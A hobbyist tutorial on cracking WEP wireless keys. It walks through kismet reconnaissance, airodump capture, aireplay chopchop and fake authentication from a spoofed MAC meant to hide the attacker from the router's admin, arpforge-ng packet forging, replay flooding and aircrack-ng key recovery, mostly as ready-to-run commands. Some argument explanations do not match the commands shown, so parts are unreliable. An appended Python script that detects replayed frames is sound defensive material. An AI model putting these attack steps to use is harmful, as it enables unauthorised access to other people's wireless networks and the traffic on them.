Backtrack 5 Wep Cracking Tutorial Pdf

Wep Cracking Tutorial

Hi, in this tutorial I will be showing you how to crack WEP without any traffic on the network. To use this tutorial you need to have packet injection working with your wireless card, kismet, the aircrack suite, arpforge and a small amount of Linux knowledge (to open konsole and put your card into monitor mode). For this tutorial I have used BackTrack (www.remote- Linux distribution as it contains all the programs and was easy to install packet injection for my driver.

My set-up: Dell Inspiron 1300 with an atheros wireless card running backtrack (I will refer to this as BT), my D-Link DI-524 router which has a 128 Bit encryption and nothing else connected wirelessly.

After you boot into BT (or any other distro you're using) put your card into monitor mode. Start kismet; we will use kismet to find out the information we will need about the AP we wish to hack. Kismet will show all the wireless access points in range. I only have 1 in range (called Crossover) but you may have more around you.

Press s then b; this will let you scroll up and down the list till you find the AP you wish to crack, then press enter. This will give you more information about the access point. Make a note of its name, the channel it's on and the BSSID (you can leave kismet open and just come back to it later to get the info), and also make sure it's WEP, as this tutorial is for WEP.
We will now run airodump to capture the IVs (data) we will need to crack the WEP. Open a new konsole and run 'airodump-ng'; this will show you all the possible options you can use with this application.

We only need to capture, so we will use -w, which is what we will call the file we are capturing, and -c to specify a channel; this will make it easier for us to capture the data from our AP. I'm going to call my file 'weptutorial' and my channel (the channel kismet shows) is 8. We will also need to add the interface to use at the end of the command; iwconfig can show this but hopefully you know, mine is ath1. Here is the command I will use:

    airodump-ng -w weptutorial -c 8 ath1

We should see our AP come up, and we might have some traffic on it, we might not.
I don't have any data on mine (as I have no wireless devices connected to it).

Now we are capturing data, we will need about 200 000 to 1 000 000 of these to crack WEP. While that's running, open a new konsole and now we will speed up the traffic (if you have wireless devices and the data is going up fast enough then you don't need to do this stage). We will now set up a method called chopchop. This is in aireplay-ng (run 'aireplay-ng' like we did airodump-ng to see all the options) and it will capture data and resend it over and over to make traffic on the network so we can capture more. The command to do this is:

    aireplay-ng --chopchop -b 00:0F:3D:3D:94:72 ath1

    aireplay-ng = the program name
    --chopchop = the attack we are using
    -b 00:0F:3D:3D:94:72 = our AP's MAC address (kismet has this info and airodump also shows it)
    ath1 = our network interface
aireplay will keep reading packets till it finds one that it thinks contains an IV (data containing the WEP). If your network has wireless traffic on it then you should get one soon; if not (like me) then we can fake authentication with the AP and hopefully it will throw a packet or 2 out that we can catch.

To do this we open another konsole and use the aireplay-ng command again but with a different attack method:

    aireplay-ng --fakeauth 50 -e Crossover -a 00:0F:3D:3D:94:72 -h 11:22:33:44:55:66 ath1

    aireplay-ng = the program name
    --fakeauth 50 = the attack we are using with the delay of 50
    -e Crossover = the name of the AP
    -a 00:0F:3D:3D:94:72 = our AP's MAC address
    -h 11:22:33:44:55:66 = a fake MAC address for us to attack from so the router's admin can't see our real MAC address
    ath1 = our network interface

We should see:

    Sending Authentication Request
    Authentication successful
After a while the attack will stop, but just re-run the command again. airodump will also show our new fake MAC is connected to the AP. Hopefully the chopchop method we started will now catch some data; press y to let it send it. It will do something like this screenshot.

You will notice airodump has gone crazy too, with lots of clients connected to the AP. Let it run its magic till the chopchop hits 100%.
Now we have a cap and xor file, and we will turn this into a file we can send back to the AP. To do this run an app called arpforge-ng; this will edit the capture slightly. I'm not going to go into detail about this app.

    arpforge-ng replay_dec-0831-173203.xor 1 00:0F:3D:3D:94:72 11:22:33:44:55:66 arp.cap

    arpforge-ng = the program name
    replay_dec-0831-173203.xor = the xor file that was caught by the chopchop method, yours will be slightly different
    1 = the type we are using
    00:0F:3D:3D:94:72 = the AP's MAC address
    11:22:33:44:55:66 = our fake MAC
    the IP source = this can be anything
    the destination = this is the AP's IP
    arp.cap = the new capture file name

After this it will say done.
We will now send this modified capture file lots of times, and very fast; this will make the data in airodump go up.

    aireplay-ng --interactive -r arp.cap ath1

Press y when it asks if you want to send this packet.

The data in airodump should now be rising very fast.

At this stage you can stop the fake auth with ctrl+c. Wait till you have about 100 000 before moving on (this may take a while). Mine is doing about a hundred a second, so make a brew.
When it hits around 100 000 we could start to crack the WEP. We will leave the rest running and catching data so it will improve our chances.

Cracking Time

Open a new konsole and run the command 'aircrack-ng' to see all the possible options; we will only be using a few.

    aircrack-ng -a 1 -e Crossover -b 00:0F:3D:3D:94:72 weptutorial-02.cap

    aircrack-ng = the program name
    -a 1 = this is to choose what we are cracking, 1 = wep, 2 = wpa-psk
    -e Crossover = the AP name
    -b 00:0F:3D:3D:94:72 = the AP MAC address
    weptutorial-02.cap = the capture file that you named when you started airodump; it will probably add -01 to yours, but as I already had one called that it made it -02. Just use tab to find out or look in the folder.
It is now testing your keys and hopefully this will find your key (this will also take time, make a sandwich).

Remember, the higher the encryption the longer it can take.

If aircrack fails just restart it and let it catch more data; for this tutorial I needed over 800 000.

This key (ModShackHack1) took me 1 hour 20 mins to crack; some may take less time, some may take more.

Hope You Crack Your WEP

-------------
McScruff
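
The replay step above resends one captured frame "lots of times, and very fast", so every copy arrives with the same IV and the same length, which a monitoring sensor can flag. The detector below is an added example and is not part of the original tutorial; the log format (timestamp, BSSID, source MAC, IV, frame length), the thresholds and the sample records are assumptions constructed for illustration.

```python
from collections import defaultdict, deque

WINDOW_S = 1.0    # sliding window in seconds (assumed tuning value)
THRESHOLD = 20    # identical frames per window that raises an alert (assumed)


def parse(line):
    """Parse 'ts bssid src iv len' (hypothetical sensor export format)."""
    ts, bssid, src, iv, length = line.split()
    return float(ts), bssid.lower(), src.lower(), iv.lower(), int(length)


def detect_replay(lines, window=WINDOW_S, threshold=THRESHOLD):
    """Alert once per (bssid, src, iv, len) seen >= threshold times in a window.

    A normal WEP sender changes the IV on every frame, so one IV and length
    repeating at a high rate from one MAC indicates a replayed frame.
    """
    seen = defaultdict(deque)   # key -> timestamps still inside the window
    alerted, alerts = set(), []
    for line in lines:
        line = line.strip()
        if not line or line.startswith("#"):
            continue
        ts, bssid, src, iv, length = parse(line)
        key = (bssid, src, iv, length)
        q = seen[key]
        q.append(ts)
        while q and ts - q[0] > window:
            q.popleft()
        if len(q) >= threshold and key not in alerted:
            alerted.add(key)
            alerts.append({"bssid": bssid, "src": src, "iv": iv, "len": length,
                           "first_seen": q[0], "count": len(q)})
    return alerts


def sample_log():
    """Constructed records: a normal client, then one frame replayed ~100/s."""
    ap = "00:0F:3D:3D:94:72"
    rows = [f"{i * 0.05:.2f} {ap} aa:bb:cc:00:00:01 {i:06x} {90 + i}"
            for i in range(30)]                      # IV changes every frame
    rows += [f"{2 + i * 0.01:.2f} {ap} 11:22:33:44:55:66 a1b2c3 68"
             for i in range(50)]                     # same IV and length
    return rows


if __name__ == "__main__":
    for alert in detect_replay(sample_log()):
        print(alert)
```

On a network still running WEP, an alert like this is a reason to move the AP to WPA2 or WPA3 rather than to tune the threshold.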